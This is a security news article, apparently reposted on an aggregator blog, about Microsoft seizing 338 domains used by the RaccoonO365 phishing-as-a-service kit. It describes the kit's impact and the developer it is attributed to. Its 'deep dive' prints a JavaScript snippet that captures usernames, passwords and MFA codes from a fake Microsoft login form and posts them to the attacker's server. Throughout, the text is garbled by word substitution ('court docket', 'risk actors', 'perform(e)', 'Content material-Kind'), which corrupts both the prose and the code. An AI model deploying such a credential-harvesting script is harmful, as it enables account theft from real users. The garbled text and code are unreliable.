Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Microsoft Dismantles 300+ Websites Used to Distribute RaccoonO365 Phishing Service

Posted on September 17, 2025September 18, 2025 By CWS

Since mid-2024, cybercriminals have leveraged a subscription-based phishing platform often called RaccoonO365 to reap Microsoft 365 credentials at scale.

Rising as an off-the-shelf service, RaccoonO365 requires minimal technical ability, permitting risk actors to deploy convincing phishing campaigns by impersonating official Microsoft communications.

These kits replicate Microsoft branding, e mail templates, and login portals to trick recipients into divulging usernames, passwords, and multi-factor authentication (MFA) codes.

As of September 2025, this operation has affected over 5,000 accounts throughout 94 international locations, demonstrating the pervasive threat posed by commoditized social engineering instruments.

In a coordinated authorized motion, Microsoft’s Digital Crimes Unit (DCU) secured a court docket order from the Southern District of New York to grab 338 domains facilitating the distribution of RaccoonO365, successfully dismantling the platform’s core infrastructure.

Microsoft analysts famous the speedy evolution of this service, which now boasts options that subvert MFA protections and automate credential harvesting at charges as much as 9,000 targets per day.

The seized domains served as each phishing hosts and command-and-control interfaces for subscription administration, crippling the flexibility of subscribers to launch recent assaults.

Though not all stolen credentials resulted in direct community intrusions, the influence on high-value sectors, significantly healthcare, was extreme.

A minimum of 20 U.S. healthcare organizations reported delayed affected person care, compromised lab outcomes, and knowledge breaches following profitable RaccoonO365 phishing makes an attempt.

Microsoft’s partnership with Well being-ISAC underlined the general public security implications, as stolen credentials usually served as preliminary entry factors for subsequent malware or ransomware deployments.

The DCU’s swift intervention illustrates the need of authorized and technical countermeasures towards low-barrier instruments that empower malicious actors.

Microsoft analysts recognized Joshua Ogundipe, a Nigeria-based developer, because the principal architect of RaccoonO365.

By an operational safety lapse revealing a cryptocurrency pockets, investigators traced over US$100,000 in subscription funds.

Ogundipe’s Telegram channel, with greater than 850 members, marketed each normal phishing kits and a newly launched “AI-MailCheck” service designed to refine spear-phishing efficacy.

This attribution underscores how streamlined legal enterprises can scale with minimal overhead, difficult defenders to anticipate modular risk companies.

An infection Mechanism Deep Dive

RaccoonO365’s an infection mechanism revolves round dynamic kind injection and clear redirection ways.

When a sufferer clicks a malicious hyperlink, the browser is redirected to a decoy login web page that mirrors Microsoft’s official portal.

RaccoonO365 login web page (Supply – Microsoft)

A small JavaScript snippet, injected at runtime, captures enter fields and forwards credentials to the attacker’s server:-

doc.querySelector(‘kind’).addEventListener(‘submit’, perform(e) {
e.preventDefault();
let creds = {
person: doc.getElementById(‘username’).worth,
move: doc.getElementById(‘password’).worth,
otp: doc.getElementById(‘mfa’).worth
};
fetch(‘ {
methodology: ‘POST’,
physique: JSON.stringify(creds),
headers: {‘Content material-Kind’: ‘software/json’}
}).then(()=> window.location.href=”
});

This code ensures seamless knowledge exfiltration whereas redirecting customers to the official login web page, minimizing suspicion.

Superior operators make use of session-token reuse and header manipulation to bypass MFA prompts.

RaccoonO365 promoting of a brand new AI-enabled service (Supply – Microsoft)

Mixed with automated e mail distribution and AI-driven content material variation, this an infection chain exemplifies trendy phishing sophistication and underscores the crucial significance of layered defenses and person consciousness.

Free stay webinar on new malware ways from our analysts! Study superior detection methods -> Register for Free

Cyber Security News Tags:Dismantles, Distribute, Microsoft, Phishing, RaccoonO365, Service, Websites

Post navigation

Previous Post: Threat Actors Abuse Adtech Companies to Target Users With Malicious Ads
Next Post: Hackers Exploit RTL/LTR Scripts and Browser Gaps to Hide Malicious URLs

Related Posts

UTG-Q-1000 Group Weaponizing Subsidy Schemes to Exfiltrate Sensitive Data Cyber Security News
F5 BIG-IP Command Injection Vulnerability Let Attackers Execute Arbitrary System Commands Cyber Security News
SSH Keys Are Crucial for Secure Remote Access but Often Remain a Blind Spot in Enterprise Security Cyber Security News
BitLocker Encryption Bypassed in Minutes Using Bitpixie Vulnerability Cyber Security News
Critical Cisco ISE Vulnerability Allows Remote Attacker to Execute Commands as Root User Cyber Security News
RubyGems Malware Attack Weaponizes 60+ Packages to Steal Credentials from Social Media and Marketing Tools Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • CISA Warns of Hackers Exploiting Ivanti Endpoint Manager Mobile Vulnerabilities to Deploy Malware
  • In Other News: 600k Hit by Healthcare Breaches, Major ShinyHunters Hacks, DeepSeek’s Coding Bias
  • SystemBC Powers REM Proxy With 1,500 Daily VPS Victims Across 80 C2 Servers
  • 17,500 Phishing Domains Target 316 Brands Across 74 Countries in Global PhaaS Surge
  • Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • CISA Warns of Hackers Exploiting Ivanti Endpoint Manager Mobile Vulnerabilities to Deploy Malware
  • In Other News: 600k Hit by Healthcare Breaches, Major ShinyHunters Hacks, DeepSeek’s Coding Bias
  • SystemBC Powers REM Proxy With 1,500 Daily VPS Victims Across 80 C2 Servers
  • 17,500 Phishing Domains Target 316 Brands Across 74 Countries in Global PhaaS Surge
  • Turla and Gamaredon Working Together in Fresh Ukrainian Intrusions

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News